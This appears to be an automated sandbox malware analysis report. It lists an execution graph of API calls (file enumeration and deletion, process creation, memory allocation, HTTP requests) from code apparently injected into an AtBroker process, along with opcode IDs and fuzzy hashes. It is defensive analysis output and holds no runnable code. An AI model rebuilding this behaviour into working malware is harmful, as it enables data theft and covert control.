                                            execution_graph 74106 2ab1feb PostThreadMessageW 74107 2ab1ffd 74106->74107 74108 2aaade0 74109 2aaadef 74108->74109 74110 2aaae30 74109->74110 74111 2aaae1d CreateThread 74109->74111 73721 2abba20 73726 2abb750 73721->73726 73723 2abba2d 73740 2abb3f0 73723->73740 73725 2abba49 73728 2abb775 73726->73728 73727 2abb8b2 73727->73723 73728->73727 73751 2ac37d0 73728->73751 73730 2abb8c9 73730->73723 73732 2abb8c0 73732->73730 73735 2abb9b1 73732->73735 73762 2ac5270 73732->73762 73767 2abae50 73732->73767 73734 2ac5270 GetFileAttributesW 73734->73735 73735->73734 73737 2abba09 73735->73737 73776 2abb1b0 73735->73776 73780 2acaab0 73737->73780 73741 2abb406 73740->73741 73748 2abb411 73740->73748 73742 2acab90 RtlAllocateHeap 73741->73742 73742->73748 73743 2abb427 73743->73725 73744 2abb71e 73745 2abb737 73744->73745 73746 2acaab0 RtlFreeHeap 73744->73746 73745->73725 73746->73745 73747 2ac5270 GetFileAttributesW 73747->73748 73748->73743 73748->73744 73748->73747 73749 2abae50 RtlFreeHeap 73748->73749 73750 2abb1b0 RtlFreeHeap 73748->73750 73749->73748 73750->73748 73752 2ac37de 73751->73752 73753 2ac37e5 73751->73753 73752->73732 73783 2ab57a0 73753->73783 73756 2ac3829 73761 2ac39c4 73756->73761 73787 2acab90 73756->73787 73759 2acaab0 RtlFreeHeap 73759->73761 73760 2ac3842 73760->73759 73760->73761 73761->73732 73763 2ac52cd 73762->73763 73764 2ac5304 73763->73764 73794 2ab9120 73763->73794 73764->73732 73766 2ac52e6 73766->73732 73768 2abae76 73767->73768 73798 2abe690 73768->73798 73770 2abaedd 73771 2abb060 73770->73771 73772 2abaefb 73770->73772 73773 2abb045 73771->73773 73774 2abad10 RtlFreeHeap 73771->73774 73772->73773 73803 2abad10 73772->73803 73773->73732 73774->73771 73777 2abb1d6 73776->73777 73778 2abe690 RtlFreeHeap 73777->73778 73779 2abb252 73778->73779 73779->73735 73811 2ac8f30 73780->73811 73782 2abba10 73782->73723 73784 2ab57c4 73783->73784 73785 2ab5800 LdrLoadDll 73784->73785 73786 2ab57cb 73784->73786 73785->73786 73786->73756 73790 2ac32a0 LdrLoadDll 73786->73790 73791 2ac8ee0 73787->73791 73789 2acabab 73789->73760 73790->73756 73792 2ac8efd 73791->73792 73793 2ac8f0e RtlAllocateHeap 73792->73793 73793->73789 73796 2ab90ee 73794->73796 73795 2ab90f8 GetFileAttributesW 73797 2ab9103 73795->73797 73796->73794 73796->73795 73796->73797 73797->73766 73800 2abe6a6 73798->73800 73799 2abe6b0 73799->73770 73800->73799 73801 2acaab0 RtlFreeHeap 73800->73801 73802 2abe6e9 73801->73802 73802->73770 73804 2abad26 73803->73804 73807 2abe700 73804->73807 73806 2abae2c 73806->73772 73808 2abe724 73807->73808 73809 2acaab0 RtlFreeHeap 73808->73809 73810 2abe7bc 73808->73810 73809->73810 73810->73806 73812 2ac8f4d 73811->73812 73813 2ac8f5e RtlFreeHeap 73812->73813 73813->73782 74112 2ab7d60 74113 2ab7d8a 74112->74113 74116 2ab8cb0 74113->74116 74115 2ab7db4 74117 2ab8ccd 74116->74117 74123 2ac8430 74117->74123 74119 2ab8d1d 74120 2ab8d24 74119->74120 74121 2ac84e0 LdrInitializeThunk 74119->74121 74120->74115 74122 2ab8d4d 74121->74122 74122->74115 74124 2ac849d 74123->74124 74125 2ac8454 74123->74125 74128 4ae2e50 LdrInitializeThunk 74124->74128 74125->74119 74126 2ac84d6 74126->74119 74128->74126 73819 2ac02a0 73820 2ac0304 73819->73820 73848 2ab72b0 73820->73848 73822 2ac0434 73823 2ac042d 73823->73822 73855 2ab73c0 73823->73855 73825 2ac05d3 73826 2ac04b0 73826->73825 73827 2ac05e2 73826->73827 73859 2ac0080 73826->73859 73828 2ac8c10 NtClose 73827->73828 73830 2ac05ec 73828->73830 73831 2ac04e5 73831->73827 73832 2ac04f0 73831->73832 73833 2acab90 RtlAllocateHeap 73832->73833 73834 2ac0519 73833->73834 73835 2ac0538 73834->73835 73836 2ac0522 73834->73836 73868 2abff70 CoInitialize 73835->73868 73837 2ac8c10 NtClose 73836->73837 73839 2ac052c 73837->73839 73840 2ac0546 73870 2ac8750 73840->73870 73842 2ac05c2 73874 2ac8c10 73842->73874 73844 2ac05cc 73845 2acaab0 RtlFreeHeap 73844->73845 73845->73825 73846 2ac0564 73846->73842 73847 2ac8750 LdrInitializeThunk 73846->73847 73847->73846 73849 2ab72e3 73848->73849 73850 2ab7307 73849->73850 73877 2ac8800 73849->73877 73850->73823 73852 2ab732a 73852->73850 73853 2ac8c10 NtClose 73852->73853 73854 2ab73aa 73853->73854 73854->73823 73856 2ab73e5 73855->73856 73882 2ac85f0 73856->73882 73860 2ac009c 73859->73860 73861 2ab57a0 LdrLoadDll 73860->73861 73863 2ac00ba 73861->73863 73862 2ac00c3 73862->73831 73863->73862 73864 2ab57a0 LdrLoadDll 73863->73864 73865 2ac018e 73864->73865 73866 2ab57a0 LdrLoadDll 73865->73866 73867 2ac01eb 73865->73867 73866->73867 73867->73831 73869 2abffd5 73868->73869 73869->73840 73871 2ac876d 73870->73871 73887 4ae2ac0 LdrInitializeThunk 73871->73887 73872 2ac879d 73872->73846 73875 2ac8c2d 73874->73875 73876 2ac8c3e NtClose 73875->73876 73876->73844 73878 2ac881d 73877->73878 73881 4ae2bc0 LdrInitializeThunk 73878->73881 73879 2ac8849 73879->73852 73881->73879 73883 2ac860a 73882->73883 73886 4ae2b80 LdrInitializeThunk 73883->73886 73884 2ab7459 73884->73826 73886->73884 73887->73872 73888 2ac89a0 73889 2ac8a1a 73888->73889 73891 2ac89c1 73888->73891 73890 2ac8a30 NtCreateFile 73889->73890 73892 2ac93a0 73893 2ac93d2 73892->73893 73894 2ac941d 73893->73894 73895 2ac93f6 InternetConnectA 73893->73895 73901 2ac9320 73902 2ac9352 73901->73902 73903 2ac9376 InternetOpenA 73902->73903 73904 2ac9391 73902->73904 73905 2ab8ba4 73906 2ab8bb6 73905->73906 73911 2ac83e0 73906->73911 73909 2ac8c10 NtClose 73910 2ab8bf6 73909->73910 73912 2ac83fa 73911->73912 73915 4ae34e0 LdrInitializeThunk 73912->73915 73913 2ab8bea 73913->73909 73915->73913 74129 2ab3bf3 74130 2ab72b0 2 API calls 74129->74130 74131 2ab3c13 74130->74131 73916 2ab8130 73917 2ab8141 73916->73917 73918 2ac8c10 NtClose 73917->73918 73919 2ab819f 73917->73919 73920 2ab8167 73918->73920 73921 2ab82c8 73919->73921 73926 2ab7540 73919->73926 73924 2ab7540 3 API calls 73920->73924 73923 2ab82a2 73923->73921 73941 2ab7710 73923->73941 73924->73919 73927 2ab756c 73926->73927 73928 2ab73c0 LdrInitializeThunk 73927->73928 73929 2ab75b6 73928->73929 73930 2ab7658 73929->73930 73931 2ac8750 LdrInitializeThunk 73929->73931 73930->73923 73934 2ab75dd 73931->73934 73932 2ab764f 73933 2ac8c10 NtClose 73932->73933 73933->73930 73934->73932 73935 2ab7664 73934->73935 73936 2ac8750 LdrInitializeThunk 73934->73936 73937 2ac8c10 NtClose 73935->73937 73936->73934 73938 2ab766d 73937->73938 73939 2ab73c0 LdrInitializeThunk 73938->73939 73940 2ab768a 73938->73940 73939->73940 73940->73923 73942 2ab7735 73941->73942 73943 2ab72b0 2 API calls 73942->73943 73945 2ab7765 73942->73945 73943->73945 73944 2ab7a01 73944->73921 73945->73944 73946 2ab73c0 LdrInitializeThunk 73945->73946 73954 2ab7968 73945->73954 73948 2ab7891 73946->73948 73947 2ab73c0 LdrInitializeThunk 73949 2ab79b6 73947->73949 73950 2ab789c 73948->73950 73948->73954 73967 2ab7470 73949->73967 73952 2ac8c10 NtClose 73950->73952 73956 2ab78a6 73952->73956 73953 2ac8c10 NtClose 73953->73944 73954->73947 73955 2ab79c6 73955->73953 73957 2ab73c0 LdrInitializeThunk 73956->73957 73958 2ab78f1 73957->73958 73959 2ac8c10 NtClose 73958->73959 73960 2ab78fb 73959->73960 73961 2ab73c0 LdrInitializeThunk 73960->73961 73962 2ab7946 73961->73962 73963 2ab7470 LdrInitializeThunk 73962->73963 73964 2ab7956 73963->73964 73965 2ac8c10 NtClose 73964->73965 73966 2ab7960 73965->73966 73966->73921 73968 2ab7496 73967->73968 73971 2ac8650 73968->73971 73972 2ac866a 73971->73972 73975 4ae2fb0 LdrInitializeThunk 73972->73975 73973 2ab7524 73973->73955 73975->73973 73976 2ac9430 73977 2ac9462 73976->73977 73978 2ac94ad 73977->73978 73979 2ac9486 HttpOpenRequestA 73977->73979 74137 2ac82f0 74138 2ac830a 74137->74138 74141 4ae2d10 LdrInitializeThunk 74138->74141 74139 2ac8332 74141->74139 74142 2acbbf0 74143 2acaab0 RtlFreeHeap 74142->74143 74144 2acbc05 74143->74144 74145 2ac6370 74146 2ac63ca 74145->74146 74148 2ac63d7 74146->74148 74149 2ac3f00 74146->74149 74152 2ac3f41 74149->74152 74156 2acaa20 74149->74156 74151 2ac4046 74151->74148 74152->74151 74153 2ab57a0 LdrLoadDll 74152->74153 74155 2ac3f87 74153->74155 74154 2ac3fc0 Sleep 74154->74155 74155->74151 74155->74154 74159 2ac8d50 74156->74159 74158 2acaa51 74158->74152 74160 2ac8db9 74159->74160 74162 2ac8d74 74159->74162 74161 2ac8dcf NtAllocateVirtualMemory 74160->74161 74161->74158 74162->74158 74163 2ac2170 74164 2ac218c 74163->74164 74165 2ac21c8 74164->74165 74166 2ac21b4 74164->74166 74167 2ac8c10 NtClose 74165->74167 74168 2ac8c10 NtClose 74166->74168 74169 2ac21d1 74167->74169 74170 2ac21bd 74168->74170 74173 2acabd0 RtlAllocateHeap 74169->74173 74172 2ac21dc 74173->74172 74174 4ae29f0 LdrInitializeThunk 74175 2ab454f 74176 2ab455f 74175->74176 74177 2ab4574 74176->74177 74178 2ac8c10 NtClose 74176->74178 74178->74177 74179 2aaae40 74182 2aab17d 74179->74182 74181 2aab651 74182->74181 74183 2aca740 74182->74183 74184 2aca766 74183->74184 74189 2aa3dc0 74184->74189 74186 2aca772 74188 2aca7a0 74186->74188 74192 2ac59b0 74186->74192 74188->74181 74196 2ab4650 74189->74196 74191 2aa3dcd 74191->74186 74193 2ac5a0a 74192->74193 74195 2ac5a17 74193->74195 74207 2ab3580 74193->74207 74195->74188 74197 2ab4667 74196->74197 74199 2ab4680 74197->74199 74200 2ac9630 74197->74200 74199->74191 74202 2ac9648 74200->74202 74201 2ac966c 74201->74199 74202->74201 74203 2ac8340 LdrInitializeThunk 74202->74203 74204 2ac96c1 74203->74204 74205 2acaab0 RtlFreeHeap 74204->74205 74206 2ac96d7 74205->74206 74206->74199 74208 2ab35bb 74207->74208 74223 2ab8c10 74208->74223 74210 2ab35c3 74211 2acab90 RtlAllocateHeap 74210->74211 74222 2ab388f 74210->74222 74212 2ab35d9 74211->74212 74213 2acab90 RtlAllocateHeap 74212->74213 74214 2ab35ea 74213->74214 74215 2acab90 RtlAllocateHeap 74214->74215 74217 2ab35fb 74215->74217 74218 2ab368e 74217->74218 74232 2ab7a10 74217->74232 74219 2ab57a0 LdrLoadDll 74218->74219 74220 2ab384f 74219->74220 74255 2ab3070 74220->74255 74222->74195 74224 2ab8c3c 74223->74224 74225 2ab8c69 74224->74225 74226 2ab8c81 74224->74226 74228 2ab8c74 74225->74228 74229 2ac8c10 NtClose 74225->74229 74227 2ab8c9d 74226->74227 74230 2ac8c10 NtClose 74226->74230 74227->74210 74228->74210 74229->74228 74231 2ab8c93 74230->74231 74231->74210 74233 2ab7a35 74232->74233 74234 2ab72b0 2 API calls 74233->74234 74236 2ab7a69 74233->74236 74234->74236 74235 2ab7b86 74235->74218 74236->74235 74237 2ab7540 3 API calls 74236->74237 74238 2ab7aff 74237->74238 74239 2ab7b0a 74238->74239 74240 2ab73c0 LdrInitializeThunk 74238->74240 74239->74218 74241 2ab7bbd 74240->74241 74242 2ac8c10 NtClose 74241->74242 74254 2ab7c72 74241->74254 74248 2ab7bd2 74242->74248 74243 2ab7540 3 API calls 74244 2ab7c88 74243->74244 74245 2ab7710 4 API calls 74244->74245 74247 2ab7c8f 74244->74247 74246 2ab7ccc 74245->74246 74246->74218 74247->74218 74249 2ab73c0 LdrInitializeThunk 74248->74249 74250 2ab7c1d 74249->74250 74251 2ac8c10 NtClose 74250->74251 74252 2ab7c27 74251->74252 74253 2ab73c0 LdrInitializeThunk 74252->74253 74253->74254 74254->74243 74258 2ab308a 74255->74258 74271 2ab8ee0 74255->74271 74257 2ab3568 74257->74222 74258->74257 74275 2ac1b40 74258->74275 74261 2ab328b 74262 2acbcc0 2 API calls 74261->74262 74265 2ab32a0 74262->74265 74263 2ab30e8 74263->74257 74278 2acbb90 74263->74278 74264 2ab8e80 LdrInitializeThunk 74267 2ab32cb 74264->74267 74265->74267 74283 2ab1b00 74265->74283 74267->74257 74267->74264 74268 2ab1b00 LdrInitializeThunk 74267->74268 74268->74267 74269 2ab8e80 LdrInitializeThunk 74270 2ab33fa 74269->74270 74270->74267 74270->74269 74272 2ab8eed 74271->74272 74273 2ab8f0e SetErrorMode 74272->74273 74274 2ab8f15 74272->74274 74273->74274 74274->74258 74276 2acaa20 NtAllocateVirtualMemory 74275->74276 74277 2ac1b61 74275->74277 74276->74277 74277->74263 74279 2acbba6 74278->74279 74280 2acbba0 74278->74280 74281 2acab90 RtlAllocateHeap 74279->74281 74280->74261 74282 2acbbcc 74281->74282 74282->74261 74286 2ac8e50 74283->74286 74287 2ac8e6d 74286->74287 74290 4ae2b90 LdrInitializeThunk 74287->74290 74288 2ab1b22 74288->74270 74290->74288 73980 2ab8300 73981 2ab8372 73980->73981 73982 2ab8318 73980->73982 73982->73981 73984 2abbf20 73982->73984 73986 2abbf46 73984->73986 73985 2abc15f 73985->73981 73986->73985 74011 2ac8fc0 73986->74011 73988 2abbfbc 73988->73985 74014 2acbcc0 73988->74014 73990 2abbfd2 73990->73985 73991 2abc0a3 73990->73991 74020 2ac8340 73990->74020 73993 2ab69c0 LdrInitializeThunk 73991->73993 73995 2abc0c2 73991->73995 73993->73995 73999 2abc147 73995->73999 74032 2ac7fb0 73995->74032 73996 2abc08b 74028 2ab8e80 73996->74028 73997 2abc037 73997->73985 73997->73996 73998 2abc069 73997->73998 74024 2ab69c0 73997->74024 74047 2ac4bb0 LdrInitializeThunk 73998->74047 74005 2ab8e80 LdrInitializeThunk 73999->74005 74007 2abc155 74005->74007 74006 2abc11e 74037 2ac8030 74006->74037 74007->73981 74009 2abc138 74042 2ac8130 74009->74042 74012 2ac8fdd 74011->74012 74013 2ac8fee CreateProcessInternalW 74012->74013 74013->73988 74016 2acbc30 74014->74016 74015 2acbc8d 74015->73990 74016->74015 74017 2acab90 RtlAllocateHeap 74016->74017 74018 2acbc6a 74017->74018 74019 2acaab0 RtlFreeHeap 74018->74019 74019->74015 74021 2ac835a 74020->74021 74048 4ae2b2a 74021->74048 74022 2abc02e 74022->73991 74022->73997 74025 2ab69d3 74024->74025 74051 2ac84e0 74025->74051 74027 2ab69fe 74027->73998 74029 2ab8e93 74028->74029 74057 2ac8260 74029->74057 74031 2ab8ebe 74031->73981 74033 2ac8006 74032->74033 74034 2ac7fd1 74032->74034 74063 4ae38d0 LdrInitializeThunk 74033->74063 74034->74006 74035 2ac802b 74035->74006 74038 2ac8086 74037->74038 74039 2ac8051 74037->74039 74064 4ae4260 LdrInitializeThunk 74038->74064 74039->74009 74040 2ac80ab 74040->74009 74043 2ac8189 74042->74043 74044 2ac8154 74042->74044 74065 4ae2ed0 LdrInitializeThunk 74043->74065 74044->73999 74045 2ac81ae 74045->73999 74047->73996 74049 4ae2b3f LdrInitializeThunk 74048->74049 74050 4ae2b31 74048->74050 74049->74022 74050->74022 74052 2ac8556 74051->74052 74053 2ac8501 74051->74053 74056 4ae2c30 LdrInitializeThunk 74052->74056 74053->74027 74054 2ac859b 74054->74027 74056->74054 74058 2ac82b9 74057->74058 74060 2ac8284 74057->74060 74062 4ae2cf0 LdrInitializeThunk 74058->74062 74059 2ac82de 74059->74031 74060->74031 74062->74059 74063->74035 74064->74040 74065->74045 74291 2ab6a40 74292 2ab8e80 LdrInitializeThunk 74291->74292 74294 2ab6a70 74291->74294 74292->74294 74295 2ab6a9c 74294->74295 74296 2ab8e00 74294->74296 74297 2ab8e44 74296->74297 74302 2ab8e65 74297->74302 74303 2ac80b0 74297->74303 74299 2ab8e55 74300 2ab8e71 74299->74300 74301 2ac8c10 NtClose 74299->74301 74300->74294 74301->74302 74302->74294 74304 2ac8106 74303->74304 74305 2ac80d1 74303->74305 74308 4ae4570 LdrInitializeThunk 74304->74308 74305->74299 74306 2ac812b 74306->74299 74308->74306 74309 2abd1c0 74310 2abd1e9 74309->74310 74311 2abd2ed 74310->74311 74312 2abd293 FindFirstFileW 74310->74312 74312->74311 74314 2abd2ae 74312->74314 74313 2abd2d4 FindNextFileW 74313->74314 74315 2abd2e6 FindClose 74313->74315 74314->74313 74315->74311 74066 2ac0b80 74067 2ac0b9d 74066->74067 74068 2ab57a0 LdrLoadDll 74067->74068 74069 2ac0bbb 74068->74069 74070 2ac2500 74075 2ac250f 74070->74075 74071 2ac2599 74072 2ac2556 74073 2acaab0 RtlFreeHeap 74072->74073 74074 2ac2566 74073->74074 74075->74071 74075->74072 74076 2ac2594 74075->74076 74077 2acaab0 RtlFreeHeap 74076->74077 74077->74071 74316 2ac94c0 74317 2ac94f2 74316->74317 74318 2ac9516 HttpSendRequestA 74317->74318 74319 2ac9531 74317->74319 74320 2ac81c0 74321 2ac8222 74320->74321 74322 2ac81e1 74320->74322 74325 4ae2e00 LdrInitializeThunk 74321->74325 74323 2ac8253 74325->74323 74078 2ac1d01 74090 2ac8ad0 74078->74090 74080 2ac1d22 74081 2ac1d55 74080->74081 74082 2ac1d40 74080->74082 74083 2ac8c10 NtClose 74081->74083 74084 2ac8c10 NtClose 74082->74084 74087 2ac1d5e 74083->74087 74085 2ac1d49 74084->74085 74086 2ac1d8a 74087->74086 74088 2acaab0 RtlFreeHeap 74087->74088 74089 2ac1d7e 74088->74089 74091 2ac8af1 74090->74091 74092 2ac8b42 74090->74092 74091->74080 74093 2ac8b58 NtReadFile 74092->74093 74093->74080 74326 2ab955e 74327 2ab9563 74326->74327 74329 2ab9522 74327->74329 74330 2ab7f80 LdrInitializeThunk LdrInitializeThunk 74327->74330 74330->74329 74331 2aac950 74332 2acaa20 NtAllocateVirtualMemory 74331->74332 74333 2aadfc1 74331->74333 74332->74333 74334 2ab6ad0 74335 2ab6ae6 74334->74335 74336 2ac8340 LdrInitializeThunk 74335->74336 74337 2ab6b06 74336->74337 74340 2ac8cb0 74337->74340 74339 2ab6b1b 74341 2ac8d12 74340->74341 74342 2ac8cd1 74340->74342 74345 4ae2da0 LdrInitializeThunk 74341->74345 74342->74339 74343 2ac8d43 74343->74339 74345->74343 74096 2ac8b90 74097 2ac8be2 74096->74097 74099 2ac8bb1 74096->74099 74098 2ac8bf8 NtDeleteFile 74097->74098 74100 2aba995 74101 2aba95a 74100->74101 74104 2aba99e 74100->74104 74102 2aba988 74101->74102 74103 2acaab0 RtlFreeHeap 74101->74103 74103->74102
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 02ABD2A4
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02ABD2DF
                                            • FindClose.KERNEL32(?), ref: 02ABD2EA
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                            • Instruction ID: 704c8e8c7c15be759c5daf279b8cecd7c5592836e815f5905d6df23fa21e0a0a
                                            • Opcode Fuzzy Hash: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                            • Instruction Fuzzy Hash: B6318C71940648BBDB21EFA4CC84FFB777DAF44708F144498B90DA6181DB70AA85CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02AC8A61
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                            • Instruction ID: 680dab90600e282da9f032644bff90d38ab91eccf8d16d71a1e04c1335c69600
                                            • Opcode Fuzzy Hash: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                            • Instruction Fuzzy Hash: 8221A0B2201549BFDB04DF98DC90EEB77EEAF8C714F118208FA1D93240DA30A951CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02AC8B81
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                            • Instruction ID: 316ba7c16701bbfda92596fc2fe261a6484e79808a2eb846a2c7d0fa9fc77c0f
                                            • Opcode Fuzzy Hash: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                            • Instruction Fuzzy Hash: 2221B3B2200609BFDB14DF98DC80EAB77EDEF8C714F118608BA5C97240DA35A9118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(02AB30E8,?,?,00000000,00000004,00003000,00000004,00000000,?,?,02AB30E8,?,?), ref: 02AC8DEC
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                            • Instruction ID: b073a31f1fe98a42b09510734202126fbf79f8867e06d120732b4c4864dcec1b
                                            • Opcode Fuzzy Hash: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                            • Instruction Fuzzy Hash: F81102B6240249BFDB10DF98DC80EAB77ADEF88714F108509FA1897240DB35A911CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                            • Instruction ID: f7cb91abd5adc4c8babf53e4b8ee05c82bcb040a7be280452785a51b7eb0ecca
                                            • Opcode Fuzzy Hash: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                            • Instruction Fuzzy Hash: A2014B75641604BFD210EBA9DC44FAB77ADEFC9714F118409FA5C57140DB767A00CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02AC21D1,?,00000000,02AB46BC,?,02AC21D1,02AB46BC,0000C994,?,?,?,?,?,?,?,02AC58D6), ref: 02AC8C47
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                            • Instruction ID: b9163ccdb686fd8060fe1dce6fcea23bb902cbf80ec83af1dc163298a3277171
                                            • Opcode Fuzzy Hash: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                            • Instruction Fuzzy Hash: A3E04F752402147BD210EA5ACC00FAB77ADDFC5710F018415FA0C67141D671791187A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 98f29de401de1d1e430c58cba684c8f0f0de8a2c35b3b110cef70d9e616866d6
                                            • Instruction ID: 78c5d54d4d5d04c3db44231b8fef743bc3af8768d4d133db270cc47f29e458ca
                                            • Opcode Fuzzy Hash: 98f29de401de1d1e430c58cba684c8f0f0de8a2c35b3b110cef70d9e616866d6
                                            • Instruction Fuzzy Hash: 3390023160510402F90075984A1470610058BD0295FA1C819B1415A68DC7A9D95175E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 23691406925d4eee110a4994bfe3bca145d6ce0fa4e8135eee5d1c1753cc1693
                                            • Instruction ID: 32634f89e6683bdc462b7f828e2b9aaa2b34a52aeb4258144b12231e29782f26
                                            • Opcode Fuzzy Hash: 23691406925d4eee110a4994bfe3bca145d6ce0fa4e8135eee5d1c1753cc1693
                                            • Instruction Fuzzy Hash: 9890026160110042694075984D0440660059BE13953D1C51DB1545A60CC72CD855A2A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f62c90a6c5e88806d36c6aff7c3c18d8acd722113f06f5033539e2db0b76f420
                                            • Instruction ID: 590713203b7e9993c064c7533391e3d6743dde77237d87aac68cda31e42c97b7
                                            • Opcode Fuzzy Hash: f62c90a6c5e88806d36c6aff7c3c18d8acd722113f06f5033539e2db0b76f420
                                            • Instruction Fuzzy Hash: 6090023160540012B94075984D8454640059BE0395B91C419F1415A54CCB28D95663A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 58997aae9d8486c9a7a376f27e19df5a2947a73593c46f07b1a98e366538a094
                                            • Instruction ID: f7229f6bf113cbf03406a4fed706aceddd5eaa4dd9ff8e5a031b0191ca1cac6e
